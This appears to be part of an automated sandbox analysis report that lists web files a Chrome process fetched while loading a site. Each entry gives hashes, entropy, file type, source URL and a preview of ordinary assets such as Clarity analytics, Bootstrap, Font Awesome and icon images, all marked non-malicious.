                                                                                                                                    Entropy (8bit):5.351351018429131
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:+zDEeJ7Yolr3DoUzaOGoKrsKPIdRMdOYkyJ+nMFvm87o6d0h2hNVRjy4MSbtzfWP:gD/9Yolr3D4M5yJ+nQveP4MSBaz
                                                                                                                                    MD5:49CDC2AA4517A0912673006E2106BA07
                                                                                                                                    SHA1:13D2AB6037F731E2D644D8D590D1D73DC82F68C7
                                                                                                                                    SHA-256:6CBFDDB4735BDCA8B4D594C0222541A0AA1F53EE6B4359647960ED164F595863
                                                                                                                                    SHA-512:98F19F2F291CD1C6D5441DB248D762CB864C7BF3F0123AFC24392CBBCEB9EE1B7803DC7577231B82623BC1A4865E98B569E5217C2F7EE276BC5E4ADB8CFD9FEB
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://www.clarity.ms/s/0.7.53/clarity.js
                                                                                                                                    Preview:/* clarity-js v0.7.53: https://github.com/microsoft/clarity (License: MIT) */..!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return sr},get start(){return cr},get stop(){return lr},get track(){return ar}}),e=Object.freeze({__proto__:null,get clone(){return Cr},get compute(){return Dr},get data(){return Er},get keys(){return Or},get reset(){return Ar},get start(){return _r},get stop(){return Rr},get trigger(){return Ir},get update(){return jr}}),n=Object.freeze({__proto__:null,get check(){return Xr},get compute(){return qr},get data(){return Sr},get start(){return Wr},get stop(){return Ur},get trigger(){return Yr}}),a=Object.freeze({__proto__:null,get compute(){return Kr},get data(){return Fr},get log(){return Gr},get reset(){return Zr},get start(){return Br},get stop(){return Jr},get updates(){return Vr}}),r=Object.freeze({__proto__:null,get callback(){return si},get callbacks(){return ti},get clear(){return ci},get consent(){return ui},get data(){return $r},
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (701)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):558800
                                                                                                                                    Entropy (8bit):5.6661858145390775
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:HHe/N32Dr0RnSXaKyEtG76ZKj1wa89jzQoDjU3+VLs/k5lS64cflFT3O01d:eMapiBMKZxRflF3d
                                                                                                                                    MD5:88A5FED5C87B1D3704AB225CFBE7A130
                                                                                                                                    SHA1:D64243C18FBAA356E4ABAE8414CCC4772D64060B
                                                                                                                                    SHA-256:F8E5F5CE9FF44073CFF24BCD3D2B8AA4E67B67891B14FF929FE4743880FDF82E
                                                                                                                                    SHA-512:8B8D1C9F4C36FD2383C96D0D484A6692F70422934BCCD3DB1F0787E1B753F7D5A8F0C91934805C4D865AED3D4673FF478F0AE23746D0C0E005E60848543B3D33
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var k=function(){return[function(n,S,D,d,Z,l,h,R,O){return(((n^53)&19)==((n&((((R=[34,2,46],n|72)==n&&(O=St(function(G,A,L){return L=(A=(G=function(f,H){return(f[(H=["replace","indexOf","trim"],H)[1]](d)!=-1&&(f=f.slice(f[H[1]](d))),f)[H[0]](/\s+/g,S)[H[0]](/\n/g,Z)[H[2]]()},G(Z+l)),G(Z+h)),A==L},D)),n)|56)==n&&(h=["https","",0],D=="*"?O="*":(d=g[R[2]](24,!0,h[1],new OI(D)),l=N[30](58,d,h[1]),Z=N[36](25,h[1],g[40](40,l,h[1]),v[21](R[1],1,S,D)),Z.D!=S||(Z.A==h[0]?E[30](90,h[R[1]],443,Z):Z.A=="http"&&.E[30](96,h[R[1]],80,Z)),O=Z.toString())),11))==n&&b.call(this,S),1)&&(O=x[42](16,C[42](44,v[R[0]](23,12),S),[u[20](3
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):443
                                                                                                                                    Entropy (8bit):7.296855487645181
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:6v/7ex9HQKeLniSTObPCwfvyQ+gU7rXlYhjueptQvs:PyybZS7dzlZeptQvs
                                                                                                                                    MD5:EA595ABD27296CACE135E3D050D49111
                                                                                                                                    SHA1:D9E988853C54439C6FE847FD2800579D3D14B960
                                                                                                                                    SHA-256:3D0277BB0C2F476E621893EC5125B053A353D62A8434491CCCE82D418E846CF3
                                                                                                                                    SHA-512:D4518B9CCF8B258B44347591FE677A72906653F5180FB3DD3FAF96A0D2FCC75E83E3DA03573C3652424B477B4685A8F953C228674C2626254053387703909010
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/content/dam/eld/icons---logos/icons/icon_farm_supplies.png
                                                                                                                                    Preview:.PNG........IHDR.............;0......pHYs...........~....mIDATH...M.0....{..{.1.t....@.[.@.P...t.(.\6.,...4+E.y.=...IQ....3c.j.Gx...f...<.)...-...V.....{......;.....k....of..4..:...)..kV....`330./.4...6.I..fw...K.&k....P...m..W..T.p.5zw...^..^(5.Wf.JE......C0R.f3..o.u..U.2W.....3a.(....\p...w.<\.r.^M03.:..)..sq.........#..V.$G...K.....51S..t.....m.uV.......H.bN...Z....1..".t.>....[N$9G]......;..ui...T|q.....R.0>?.....IEND.B`.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (1653)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1800
                                                                                                                                    Entropy (8bit):5.527858380938343
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:h6bLt/B26bBfdwSKKWA8PGdwSKKXAIOP/B:h2BB2qCRFPPJRcxOP/B
                                                                                                                                    MD5:28400EE7BA0A3A5E5EE5C09C1F2E6353
                                                                                                                                    SHA1:A1AE59765A3FC0AE93F564489AE1BE7F8D9F83B6
                                                                                                                                    SHA-256:A2AEDBF833ED5A8601653D379C6B33EB4A8177DD1DB4302B8BDC372DAC7B8C80
                                                                                                                                    SHA-512:1E62957340D27B6AEAB6A579DF984512090E27972264B2BDA68E0EFF7646EDA96D8EC802216AE910CFEC46226B18278FB18660231C9B6C952C37FD40D7C7E79F
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:// For license information, see `https://assets.adobedtm.com/728d44811931/14db0b582053/cbed442a9121/RCbad2c954d87f48819c96e16d0db6567c-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/728d44811931/14db0b582053/cbed442a9121/RCbad2c954d87f48819c96e16d0db6567c-source.min.js', "<script>\nconsole.log('Global | Ad Pixel Started');\n</script>\n\n Meta Pixel Code -->\n<script>\n!function(f,b,e,v,n,t,s)\n{if(f.fbq)return;n=f.fbq=function(){n.callMethod?\nn.callMethod.apply(n,arguments):n.queue.push(arguments)};\nif(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';\nn.queue=[];t=b.createElement(e);t.async=!0;\nt.src=v;s=b.getElementsByTagName(e)[0];\ns.parentNode.insertBefore(t,s)}(window, document,'script',\n'https://connect.facebook.net/en_US/fbevents.js');\nfbq('init', '842278510644971');\nfbq('track', 'PageView');\n</script>\n<noscript><img height=\"1\" width=\"1\" style=\"display:none\"\nsrc=https://www.facebook.com/tr?id=842278510644971&ev=PageView&noscript=1\n
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (538)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):8529
                                                                                                                                    Entropy (8bit):5.53641559082188
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:Zr4arfo91Mr8MfmNWtznjryEFh7GN3QTAJP1MlWrZXZ+Z6wrfr5:ZrbrUMrbf6Mznjr9h7ymlWrZsZ6wrfr5
                                                                                                                                    MD5:899004CC02C33EFC1F6694B1AEE587FD
                                                                                                                                    SHA1:8289B588E9944EBD754974D806E8BB5EE5489961
                                                                                                                                    SHA-256:377E9731DF07066631DC615291A3DBDBC923893629702F2E3B9B7A5775CC027B
                                                                                                                                    SHA-512:0EA82629AEFE013CF820CFD09544FDD8A782CA67067C101AC59238336A88C3A16000AA123B81E973D88E63763E365534C9757D906ACD48CFD12C7464EBF49BB5
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.js
                                                                                                                                    Preview:(function(c){"object"===typeof module&&module.exports?module.exports=c():(window.Granite=window.Granite||{}).Sling=c()})(function(){return{SELECTOR_INFINITY:".infinity",CHARSET:"_charset_",STATUS:":status",STATUS_BROWSER:"browser",OPERATION:":operation",OPERATION_DELETE:"delete",OPERATION_MOVE:"move",DELETE_SUFFIX:"@Delete",TYPEHINT_SUFFIX:"@TypeHint",COPY_SUFFIX:"@CopyFrom",MOVE_SUFFIX:"@MoveFrom",ORDER:":order",REPLACE:":replace",DESTINATION:":dest",SAVE_PARAM_PREFIX:":saveParamPrefix",IGNORE_PARAM:":ignore",.REQUEST_LOGIN_PARAM:"sling:authRequestLogin",LOGIN_URL:"/system/sling/login.html",LOGOUT_URL:"/system/sling/logout.html"}});.(function(c){"object"===typeof module&&module.exports?module.exports=c():(window.Granite=window.Granite||{}).Util=c()})(function(){return{patchText:function(c,h){if(h)if("[object Array]"!==Object.prototype.toString.call(h))c=c.replace("{0}",h);else for(var e=0;e<h.length;e++)c=c.replace("{"+e+"}",h[e]);return c},getTopWindow:function(){var c=window;if(this
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (1560)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):1775
                                                                                                                                    Entropy (8bit):5.0855295906697
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:dvPioG+d99D9ND9dKh2EZGS1eYzs9SHgm4:tP6u9RNRdKbgMGSM
                                                                                                                                    MD5:A5A0C9048EFB7CB5DF90023064D09BA4
                                                                                                                                    SHA1:9669B2608D986D4742DD2C0C114B148B6CDB5CDE
                                                                                                                                    SHA-256:DDFBE9EE1F7088339A85FA25A259765ADE4258C082A7921B9F569FF9616F904A
                                                                                                                                    SHA-512:97ED945E9CEFE0C070946F5D97E9D641FB7B1D9EC710DC3865D307E9F59E07D238084699D3C4E52E2F470A207AEE0E19C9C1939333DFEF041769976A0F5F1B48
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://ka-f.fontawesome.com/releases/v6.6.0/css/free-v4-font-face.min.css?token=f6136e9b49
                                                                                                                                    Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-solid-900.woff2) format("woff2"),url(../webfonts/free-fa-solid-900.ttf) format("truetype")}@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-brands-400.woff2) format("woff2"),url(../webfonts/free-fa-brands-400.ttf) format("truetype")}@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-regular-400.woff2) format("woff2"),url(../webfonts/free-fa-regular-400.ttf) format("truetype");unicode-range:u+f003,u+f006,u+f014,u+f016-f017,u+f01a-f01b,u+f01d,u+f022,u+f03e,u+f044,u+f046,u+f05c-f05d,u+f06e,u+f070,u+f087-f088,u+f08a,u+f094,u+f096-f097,u+f09d,u+f0a0,u+f0a2,u+f0a4-f0a7,u+f0c5,u+f0c7,u+f0e5-f0e6,u+f0eb,u+f0f6-f0f8,u+f10c,u+f114-f
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (606)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):216447
                                                                                                                                    Entropy (8bit):5.409018806878557
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:shoDvgQdaJb0/yjuYp56xugI+8Nb7KDCP:sho0Qdd/azdxKDa
                                                                                                                                    MD5:977E7EC6E7E29A59F7DFD9CD0AC2F4B3
                                                                                                                                    SHA1:17CF9152587CD282FB0C2F3333A875DF4A4F649D
                                                                                                                                    SHA-256:C12D4667295C265EA3084DA9F4322817C09DFB5C87CA81B6C1BF7AB2F1E82EDC
                                                                                                                                    SHA-512:BBA4B9E8E44F04A7D9A23A8AF920B7499ABDEDE4E3BCC753ABAC566E1173ECC80BC4DABE312AEE224A19A26ED4A18ABB6882F15C03ED05F5CFF4CC747F859D83
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/*.. Copyright (c) 2016 Federico Zivolo and contributors.. Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:.. The above copyright notice and this permission notice shall be included in all. copies or substantial portions of the Software... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER. LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (27377)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):27592
                                                                                                                                    Entropy (8bit):4.83669575258768
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:Euwu4Eyfd7PNRzAmReUtPAM0NuzwpmnWt:ETuqdNReUtPAM0v4E
                                                                                                                                    MD5:5E5B0D8C7BE5919570A305B6BC229A36
                                                                                                                                    SHA1:E4AB3A85D3AB0A8654A278D954FB310906526DB3
                                                                                                                                    SHA-256:1AE3C19265723696F50E3226DCD43FBC7EA617697E0D7169A8E52C854AE3826C
                                                                                                                                    SHA-512:7FB88208B7D2E585F6C2B49BAF85AEF8D374A1C3F565596B50FFE49F2B5B6B5E1B39DADFCCC0E9971000346957551DA6316A911CDEED502B1983EB1598F37D62
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */.fa.fa-glass:before{content:"\f000"}.fa.fa-envelope-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-envelope-o:before{content:"\f0e0"}.fa.fa-star-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-star-o:before{content:"\f005"}.fa.fa-close:before,.fa.fa-remove:before{content:"\f00d"}.fa.fa-gear:before{content:"\f013"}.fa.fa-trash-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-trash-o:before{content:"\f2ed"}.fa.fa-home:before{content:"\f015"}.fa.fa-file-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-file-o:before{content:"\f15b"}.fa.fa-clock-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-clock-o:before{content:"\f017"}.fa.fa-arrow-circle-o-down{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-arrow-circle-o-dow
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (12736)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):13165
                                                                                                                                    Entropy (8bit):5.228581165291596
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:NO3pHufbPUCpEcrbCpg68vhtz91LO7sgBy70nZbPkks3ZXF1vh3rg1Q5l8hY6o3+:NdACfCghtzb0tnByHVh3s1Q5l8hY+
                                                                                                                                    MD5:BC71BE90D9E5F009FBF8C9548762DD7D
                                                                                                                                    SHA1:241A1C01275BF855638CA3545CF9BBF8C79B3830
                                                                                                                                    SHA-256:1C9EBE3AF7697D5F7EA4B94176CD512255E1F6F42B811DEBF4024DFA499CD16A
                                                                                                                                    SHA-512:9B9C2861B0913B5D698C8CDB57338272A7ABB8DFD797F30C1322845989E609E8FB96EF01E8F2545CB78F32EBC6091161B19180B5013FC4F01E2C5EEC11E1673E
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:window.FontAwesomeKitConfig = {"id":30124676,"version":"6.6.0","token":"f6136e9b49","method":"css","baseUrl":"https://ka-f.fontawesome.com","license":"free","asyncLoading":{"enabled":false},"autoA11y":{"enabled":true},"baseUrlKit":"https://kit.fontawesome.com","detectConflictsUntil":null,"iconUploads":{},"minify":{"enabled":true},"v4FontFaceShim":{"enabled":true},"v4shim":{"enabled":true},"v5FontFaceShim":{"enabled":true}};.!function(t){"function"==typeof define&&define.amd?define("kit-loader",t):t()}((function(){"use strict";function t(t,e){var n=Object.keys(t);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(t);e&&(r=r.filter((function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable}))),n.push.apply(n,r)}return n}function e(e){for(var n=1;n<arguments.length;n++){var o=null!=arguments[n]?arguments[n]:{};n%2?t(Object(o),!0).forEach((function(t){r(e,t,o[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(o)):t(O
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):3772
                                                                                                                                    Entropy (8bit):3.834088123858926
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:x0h5r8869TkYp9e9oCvMA5lu/uNiPF/r7I1Ga0pFby:x0npGJkZ5A/uIxrsF0pFby
                                                                                                                                    MD5:68D8392693D2E3F169888BD1BE9621D9
                                                                                                                                    SHA1:90952E7C090EF318567B562D22A5FB8B26388321
                                                                                                                                    SHA-256:5285194B6175B6C2FD8A83876A24FBB20611FF80899323CBDF4A9DD4DE1F60CA
                                                                                                                                    SHA-512:2EC9AF1D78034D45CBC15303CC830E34690141EFADF9D30D5D0C1F7786032EA074CACAC14B023317E9508EE8DBC0C3F7F205E8CE8AE6E64E29F3856D174C6A4B
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:<svg width="76" height="22" viewBox="0 0 76 22" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M75.1241 9.3767C73.9109 9.01801 73.1197 8.98636 72.2018 8.99691C71.1257 9.01801 70.2184 9.25011 69.48 9.64045C68.5516 9.07076 67.4966 8.90196 66.737 8.99691C65.9247 9.10241 65.049 9.44001 64.2367 10.0413C63.7197 9.45056 63.5298 9.27121 63.0023 9.09186C61.9052 8.73316 60.6814 9.37671 59.964 10.1996L55.6702 14.6622C55.5014 14.831 55.3432 14.9892 55.1744 15.1475L55.1427 15.1686C53.2754 16.9409 51.5874 18.1542 49.1504 18.4601C46.0065 18.861 44.8672 16.5506 48.5807 13.2063C50.4269 11.55 51.7246 11.4023 52.2837 11.7082C53.1488 12.1724 52.9167 13.4806 48.9077 15.2846C48.4858 15.4745 47.9161 15.7277 48.1271 16.7405C48.2009 17.0992 48.5385 17.2574 48.9394 17.1941C49.1504 17.1625 49.2981 17.1097 49.4141 17.0781C53.0538 15.7805 54.4042 13.776 54.8051 13.0586C55.3432 12.1091 55.4592 10.8326 54.5941 9.89365C53.6657 8.90196 50.6063 8.21622 46.9138 10.8326C44.5612 12.4995 42.5356 14.7677 42.0714 1
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (61608)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):61893
                                                                                                                                    Entropy (8bit):5.140561960215685
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:NsO4MAvAcCfFvM6aPMPv3Mo8ExbxHTVCLXMrJ3u6byVm7MT2NIbjyixM3XpZWVe8:NDaWkNo9s3Ccd
                                                                                                                                    MD5:FC0AE1E61D12D522D67E845F4BDEBDF4
                                                                                                                                    SHA1:961BA292AC8C68C7383956C7CBCD929CAF64BD24
                                                                                                                                    SHA-256:1BBDB19132CECE5103C0A2919E09320EDC6687AB3879FC3BB1D28F0F0FA5D45F
                                                                                                                                    SHA-512:9A9DD578CA6E14A6E0C66FD731453841051C257E0065F5797AC817EF6250AFB1FBCD6BAC57A94B3F54BBF306675F6CFD770BF2C22975547907640A9F18E5BB37
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta3/dist/js/bootstrap.min.js
                                                                                                                                    Preview:/*!. * Bootstrap v5.0.0-beta3 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e(require("@popperjs/core")):"function"==typeof define&&define.amd?define(["@popperjs/core"],e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e(t.Popper)}(this,(function(t){"use strict";function e(t){if(t&&t.__esModule)return t;var e=Object.create(null);return t&&Object.keys(t).forEach((function(s){if("default"!==s){var i=Object.getOwnPropertyDescriptor(t,s);Object.defineProperty(e,s,i.get?i:{enumerable:!0,get:function(){return t[s]}})}})),e.default=t,Object.freeze(e)}var s=e(t);const i=t=>{do{t+=Math.floor(1e6*Math.random())}while(document.getElementById(t));return t},n=t=>{let e=t.getAttribute("data-bs-target");if(!e||"#"===e){let s=t.getAttribut
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (30837)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):31000
                                                                                                                                    Entropy (8bit):4.746143404849733
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:wHu5yWeTUKW+KlkJ5de2UYDyVfwYUas2l8yQ/8dwmaU8G:wwlr+Klk3Yi+fwYUf2l8yQ/e9vf
                                                                                                                                    MD5:269550530CC127B6AA5A35925A7DE6CE
                                                                                                                                    SHA1:512C7D79033E3028A9BE61B540CF1A6870C896F8
                                                                                                                                    SHA-256:799AEB25CC0373FDEE0E1B1DB7AD6C2F6A0E058DFADAA3379689F583213190BD
                                                                                                                                    SHA-512:49F4E24E55FA924FAA8AD7DEBE5FFB2E26D439E25696DF6B6F20E7F766B50EA58EC3DBD61B6305A1ACACD2C80E6E659ACCEE4140F885B9C9E71008E9001FBF4B
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
                                                                                                                                    Preview:/*!. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.7.0');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 30 x 31, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2373
                                                                                                                                    Entropy (8bit):6.9051491035012305
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:9Ra4knA9WIrCcOzZt091Anz3rDc3HKy309RJHdjEeSyL3dXXdbP1riiP4GhTeNb:93knmWIrCzZWnBHKj3JHdjv3d9bEixTI
                                                                                                                                    MD5:ED1B1A7DDF5060212D592E5105F8B197
                                                                                                                                    SHA1:460355D491FDEAF93A6549B40EB426B9E27D9F1D
                                                                                                                                    SHA-256:564DEFC382B32EDEC8C768509535C12EE88121B419D5B16C07F281DE92FA6599
                                                                                                                                    SHA-512:09394873ADF78A8A483D0EF582EE567476271C9125C0C77B12D693A5C831D72746796DA41B257113FF9FE6A49F010520C6B8B04F40EA7D0382FA1888F8623C99
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:.PNG........IHDR..............l}.....pHYs..2...2..(dZ.....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 137.da4a7e5, 2022/11/27-09:35:03 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmp:CreateDate="2023-01-27T17:24:54+10:30" xmp:ModifyDate="2023-01-27T17:36:46+10:30" xmp:MetadataDate="2023-01-27T17:36:46+10:30" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:965dcbe0-aadc-a34e-840f-84c2126aec49" xmpMM:DocumentID="adobe:docid:photoshop:1149732c-1da8-364c-90fb-7ef8f325988c" xmpMM:OriginalDocumentID="xmp.did:bcbcf
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):510
                                                                                                                                    Entropy (8bit):4.497462332670602
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:trVmvAuCwSNxLXOO5NJLsZlHkrZMzP8hpGcq+:tZm4uaNUTGMrBcq+
                                                                                                                                    MD5:73B4C1811F61B251388096354D1F301A
                                                                                                                                    SHA1:D8392C6B64CDA5BD49D9317693B623E3CB9DAE50
                                                                                                                                    SHA-256:2E81C317E3C07984BDE4B9377CC1E341E2368FB2E73A7E008C099D0BEB2F258F
                                                                                                                                    SHA-512:7D377F12A7BC974B1E8D131183D3FBBB3595C57BA17601C96D0DEB447D283A85281872B82B7797C5D6D7D13F72DF4A96FBB4A6896CBF2E7CF992C456EFC639FC
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:<svg width="12" height="20" viewBox="0 0 12 20" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M11.1454 0.222218C11.3642 0.222218 11.5826 0.302565 11.7497 0.463673C12.0834 0.785475 12.0834 1.30712 11.7497 1.62892L2.95207 10.1112L11.7497 18.5934C12.0834 18.9152 12.0834 19.4368 11.7497 19.7586C11.4159 20.0805 10.8749 20.0805 10.5411 19.7586L1.13921 10.6938C0.805448 10.372 0.805448 9.85034 1.13921 9.52854L10.5411 0.463673C10.7082 0.302565 10.9266 0.222218 11.1454 0.222218Z" fill="#9E9FA2"/>.</svg>.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (32755)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):36178
                                                                                                                                    Entropy (8bit):5.31962188524243
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:wYRKHdumNd/M2r+VVXJrk6Hx372qDgDsVKg7CUgBFmY7K:wfdu+d/76vXKSySGbK
                                                                                                                                    MD5:D8232F86C8016A8E0ACAA7ECFDF72B3E
                                                                                                                                    SHA1:C21FB1EF9E07FBF03A08C152DC0C1B755D42C475
                                                                                                                                    SHA-256:B3BCE010C0F5A7C24A82AE511194BAF67BF8C2CEE737A3A118F6B9590D322B15
